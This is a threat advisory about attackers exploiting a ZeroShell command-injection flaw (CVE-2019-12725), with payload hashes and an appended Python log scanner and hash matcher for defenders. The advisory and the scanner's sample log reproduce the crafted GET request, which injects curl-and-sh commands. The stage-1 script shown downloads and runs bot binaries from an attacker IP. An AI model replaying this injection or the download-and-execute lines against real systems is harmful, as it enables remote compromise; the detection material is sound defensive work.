APTs Exploit Linux ‘ZeroShell’
Over the past 2 weeks researchers and organizations have seen an increase in exploit attempts against the ZeroShell software. “ZeroShell is a Linux based distribution dedicated to the implementation of Router and Firewall Appliances completely administrable via web interface.” The attackers are leveraging a Remote Code Execution vulnerability (CVE-2019-12725) to bypass authentication and run commands directly on the host, allowing for full compromise. The vulnerability exists because parameters in an HTTP GET request are not properly sanitized.
The attack starts with a crafted GET request to the vulnerable host, which uses specific parameters to bypass authentication and then supplies the operating system command to run. The attackers use native commands (curl and sh) to download the first shell script and execute it; that script in turn downloads and runs additional files.
- Stage 1 – Use the crafted GET request to download a shell script and run it.
  - Request: ‘GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O hxxp://5.206.227[.]228/zero;sh zero;"’
  - Contents of zero:
    - cd /tmp
    - curl -O hxxp://5.206.227[.]228/bot.x86_64; chmod 777 bot.x86_64; ./bot.x86_64
    - curl -O hxxp://5.206.227[.]228/bot.x86; chmod 777 bot.x86; ./bot.x86
- Stage 2 – Download additional malicious files and infect the system. SHA-256 hashes of the payloads:
  - bot.x86 – ebfa0aa59700e61bcf064fd439fb18b030237f14f286c6587981af1e68a8e477
  - bot.x86_64 – 6027d9ec503f69dbb58560a63e6acd62d7ab93f36bf8f676d282394a0e55be95
  - bot.arm5 – ea0bd1002078bb304b20d8ce5c475b622c0b13656bee37841a65d19c59223259
  - bot.arm6 – 64814ee2f5a98b9ae96b58cf6d9dc08fe12460070bd55ca8d7e138f9765fcffb
  - bot.arm7 – e077670ff29678f0b10875dc9be0603d9a65c402b9aae48b793e6f041140a9bd
These additional files have been analyzed and are flagged on VirusTotal as Backdoors/Trojans.
Currently the attacks are not being attributed to any particular APT group. The vulnerability has been well documented, and ZeroShell has released updates that address and correct this flaw.
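As an added defender-side example (not code from this advisory or from the ZeroShell project), the following Python script does two things a responder would want after reading the above: it scans web-server access log lines for the unauthenticated x509List request shape with shell metacharacters in the type parameter, and it matches file hashes against the SHA-256 list. The CGI path, parameter names and hashes come from the text above; the combined-log line layout, the sample log lines (with spaces percent-encoded as a server would log them, URL kept defanged) and the severity labels are assumptions.

```python
import hashlib
import re
from urllib.parse import urlsplit, unquote_plus

# SHA-256 hashes of the second-stage binaries listed in the advisory above.
IOC_SHA256 = {
    "ebfa0aa59700e61bcf064fd439fb18b030237f14f286c6587981af1e68a8e477": "bot.x86",
    "6027d9ec503f69dbb58560a63e6acd62d7ab93f36bf8f676d282394a0e55be95": "bot.x86_64",
    "ea0bd1002078bb304b20d8ce5c475b622c0b13656bee37841a65d19c59223259": "bot.arm5",
    "64814ee2f5a98b9ae96b58cf6d9dc08fe12460070bd55ca8d7e138f9765fcffb": "bot.arm6",
    "e077670ff29678f0b10875dc9be0603d9a65c402b9aae48b793e6f041140a9bd": "bot.arm7",
}

# Shell metacharacters that a legitimate certificate-type selector never contains.
SHELL_META = re.compile(r"""[;|&`$"'\n]""")

# Combined-log-format line (assumed layout; adjust the pattern for your web server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines; the first mirrors the request shape shown in the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Jul/2019:13:02:11 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20/tmp;curl%20-O%20hxxp://5.206.227[.]228/zero;sh%20zero;%22 HTTP/1.1" 200 512
198.51.100.9 - - [15/Jul/2019:13:02:15 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=ca HTTP/1.1" 200 1024
192.0.2.4 - - [15/Jul/2019:13:03:01 +0000] "GET /cgi-bin/kerbynet?Section=Login HTTP/1.1" 200 2048
192.0.2.5 - - [15/Jul/2019:13:04:01 +0000] "GET /index.html HTTP/1.1" 200 300
""".splitlines()


def parse_query(query):
    """Split a query string on '&' only, so a ';' inside a value stays part of that value."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def classify_request(target):
    """Return (severity, reason) for a request target, or None if it is not of interest."""
    parts = urlsplit(target)
    if not parts.path.endswith("/cgi-bin/kerbynet"):
        return None
    q = parse_query(parts.query)
    if not (q.get("Section") == "NoAuthREQ" and q.get("Action") == "x509List"):
        return None
    type_val = q.get("type", "")
    if SHELL_META.search(type_val):
        return ("high", "shell metacharacters in x509List type parameter: %r" % type_val[:80])
    return ("low", "unauthenticated x509List call without metacharacters; review source and volume")


def scan_log(lines):
    """Return one finding dict per log line whose request matches the pattern."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m.group("target"))
        if verdict:
            findings.append({"ip": m.group("ip"), "severity": verdict[0], "reason": verdict[1]})
    return findings


def match_ioc(sha256_hex):
    """Return the payload name if a SHA-256 digest is in the advisory's list, else None."""
    return IOC_SHA256.get(sha256_hex.lower())


def sha256_of_bytes(data):
    """Hash file contents so match_ioc can be run over files collected from /tmp."""
    return hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("[%s] %s: %s" % (f["severity"], f["ip"], f["reason"]))
```

The query parser deliberately splits on `&` only: splitting on `;` as well (which older Python versions of `parse_qs` did) would cut the injected command out of the type value and hide exactly the thing being looked for. If your server logs the raw, unencoded request line, the `\S+` target capture will stop at the first space and the pattern needs loosening.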
Sources: